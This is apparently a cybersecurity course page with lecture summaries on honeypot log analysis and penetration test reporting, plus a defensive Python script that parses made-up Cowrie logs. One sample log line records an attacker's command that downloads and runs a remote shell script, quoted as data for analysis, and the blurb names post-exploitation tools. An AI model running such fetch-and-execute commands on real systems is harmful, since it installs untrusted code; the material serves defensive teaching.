The core of the lab focuses on analysis. You will learn to interpret Cowrie’s detailed JSON log files to extract actionable intelligence, such as attacker IP addresses, usernames and passwords used in brute-force attempts, and the specific commands they run. This exercise will solidify your understanding of how honeypots serve as an early-warning system and a valuable source of threat intelligence, allowing you to study malicious behaviour without risking your real network infrastructure.
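The following is an added example, not code from the course or from the Cowrie project, of the log analysis the lab builds towards. It reads a few constructed lines in the shape of Cowrie's `cowrie.json` output (one JSON object per line, with `eventid`, `src_ip`, `session`, and the login or command fields) and produces the intelligence the lab asks for: attempts per source, the most-tried credential pairs, successful logins, the commands run in each session, and any URLs the attacker tried to fetch. The IP addresses are from the 203.0.113.0/24 documentation range and every line is made up.

```python
import json
import re
from collections import Counter, defaultdict

# Constructed lines in Cowrie's cowrie.json format (one JSON object per line).
SAMPLE_LOG = """\
{"eventid": "cowrie.session.connect", "src_ip": "203.0.113.7", "session": "a1b2c3", "timestamp": "2024-05-01T10:00:00.000000Z"}
{"eventid": "cowrie.login.failed", "username": "root", "password": "123456", "src_ip": "203.0.113.7", "session": "a1b2c3", "timestamp": "2024-05-01T10:00:01.000000Z"}
{"eventid": "cowrie.login.failed", "username": "root", "password": "admin", "src_ip": "203.0.113.7", "session": "a1b2c3", "timestamp": "2024-05-01T10:00:02.000000Z"}
{"eventid": "cowrie.login.success", "username": "root", "password": "password", "src_ip": "203.0.113.7", "session": "a1b2c3", "timestamp": "2024-05-01T10:00:03.000000Z"}
{"eventid": "cowrie.command.input", "input": "uname -a", "src_ip": "203.0.113.7", "session": "a1b2c3", "timestamp": "2024-05-01T10:00:04.000000Z"}
{"eventid": "cowrie.command.input", "input": "wget http://203.0.113.99/x.sh -O /tmp/x.sh; chmod +x /tmp/x.sh; /tmp/x.sh", "src_ip": "203.0.113.7", "session": "a1b2c3", "timestamp": "2024-05-01T10:00:05.000000Z"}
{"eventid": "cowrie.session.closed", "src_ip": "203.0.113.7", "session": "a1b2c3", "timestamp": "2024-05-01T10:00:06.000000Z"}
{"eventid": "cowrie.session.connect", "src_ip": "203.0.113.42", "session": "d4e5f6", "timestamp": "2024-05-01T10:05:00.000000Z"}
{"eventid": "cowrie.login.failed", "username": "admin", "password": "admin", "src_ip": "203.0.113.42", "session": "d4e5f6", "timestamp": "2024-05-01T10:05:01.000000Z"}
{"eventid": "cowrie.login.failed", "username": "root", "password": "123456", "src_ip": "203.0.113.42", "session": "d4e5f6", "timestamp": "2024-05-01T10:05:02.000000Z"}
{"eventid": "cowrie.session.closed", "src_ip": "203.0.113.42", "session": "d4e5f6", "timestamp": "2024-05-01T10:05:03.000000Z"}
"""

URL_RE = re.compile(r"https?://\S+")


def summarise(log_text):
    attempts_by_ip = Counter()
    credentials = Counter()
    successes = []
    commands = defaultdict(list)
    download_urls = set()
    for line in log_text.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        kind = event["eventid"]
        if kind in ("cowrie.login.failed", "cowrie.login.success"):
            attempts_by_ip[event["src_ip"]] += 1
            credentials[(event["username"], event["password"])] += 1
        if kind == "cowrie.login.success":
            successes.append((event["src_ip"], event["username"], event["password"]))
        elif kind == "cowrie.command.input":
            # Commands are the most valuable part: they show intent and,
            # often, the second-stage payload's hosting location.
            commands[event["session"]].append(event["input"])
            download_urls.update(URL_RE.findall(event["input"]))
    return {
        "attempts_by_ip": attempts_by_ip,
        "top_credentials": credentials.most_common(3),
        "successes": successes,
        "commands": dict(commands),
        "download_urls": sorted(download_urls),
    }


if __name__ == "__main__":
    report = summarise(SAMPLE_LOG)
    for key, value in report.items():
        print(key, value)
```

The extracted fields map directly onto defensive actions: source addresses feed blocklists or firewall rules, the tried credential pairs show which defaults to ban on real systems, and the download URLs are indicators to hunt for in proxy and DNS logs across the rest of the estate.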
This lecture covers the essential structure and components of an effective penetration testing report, the primary deliverable that communicates your findings. We begin by emphasising the importance of the executive summary, which must concisely explain the key results and business impact in plain, non-technical language for leadership. The module guides you on how to clearly define the scope of the engagement and the methodologies used to establish context. You will learn how to describe vulnerabilities with clarity, using evidence such as screenshots and code snippets to illustrate the real-world risk and exploit chain. Crucially, the lecture focuses on providing actionable, step-by-step remediation advice, ensuring the client knows exactly how to fix the issues. Finally, we underscore the necessity of a professional, well-structured, and jargon-free document that is proofread and sanitised of any sensitive information.
This lecture covers the standard risk rating matrix used to categorise and prioritise vulnerabilities based on their potential business impact and likelihood of exploitation. We break down the five common severity levels, starting with Critical risks that demand immediate attention due to their potential for major system compromise or data breach. High-risk issues are serious and easily exploitable, leading to significant consequences like data theft. Medium-risk vulnerabilities are exploitable but may require specific conditions, while Low-risk findings pose a minimal threat. Finally, Informational items do not represent a direct threat but provide useful context for hardening defences. This framework is essential for helping stakeholders understand where to focus their resources and for justifying the prioritisation of remediation efforts.
This lecture covers the critical soft skills required to communicate complex technical security findings effectively to an audience without a technical background, such as executives or managers. The key is to use plain language, avoiding jargon and acronyms, and to consistently translate technical vulnerabilities into clear business impacts concerning operations, finance, and reputation. We discuss the technique of storytelling to create a narrative around the testing process and findings, making the information more relatable and memorable. The module advises you to highlight only the top risks to avoid overwhelming your audience and to always pair every problem presented with a practical, business-focused solution or recommended next step, fostering a constructive dialogue rather than simply delivering a list of failures.
This lecture covers the level of granular technical detail required in the appendices or technical sections of a report to ensure findings are reproducible, actionable, and verifiable by technical teams. We stress the importance of meticulously listing all tools and their specific version numbers to eliminate ambiguity. The module instructs you to include the exact payloads, commands, and exploit code used, moving beyond generic labels to provide proof of concept. You will learn to provide detailed, step-by-step instructions that allow another engineer to replicate the vulnerability reliably. This includes documenting the precise environment details, such as OS, user privileges, and service versions, that were relevant to the exploit. Finally, we emphasise using supporting evidence like terminal logs, HTTP requests/responses, and screenshots to validate every finding conclusively.
Master the fundamentals of offensive cybersecurity in this hands-on course. "Byte-Sized Cyber Security Fundamentals – Part 4" is designed to take you from understanding vulnerabilities to executing controlled attacks and securing modern environments.
This course delves into the core of ethical hacking. You will first grasp the critical difference between a vulnerability and an exploit, then learn the structured phases of a penetration test from reconnaissance to covering your tracks.
Get ready for practical action. You will explore common web application attacks like SQL Injection and Cross-Site Scripting (XSS), using tools like Burp Suite and OWASP ZAP. We then guide you through post-exploitation, teaching you how to maintain access and escalate privileges on both Windows and Linux systems using powerful tools like Mimikatz and LinPEAS.
We also address today's most critical platforms: the cloud and mobile devices. You will learn about the Shared Responsibility Model, identify common cloud misconfigurations that lead to data leaks, and understand how to defend against mobile specific threats.
The learning extends to wireless networks, where you will understand how to crack weak encryption and demonstrate risks like Evil Twin attacks. Finally, learn how to communicate your findings effectively by writing professional penetration test reports for both technical and management audiences.
Whether you're an aspiring ethical hacker, an IT professional, or a developer, this course provides the essential, practical skills to attack and defend systems effectively. Enroll now and transform your theoretical knowledge into actionable cybersecurity expertise.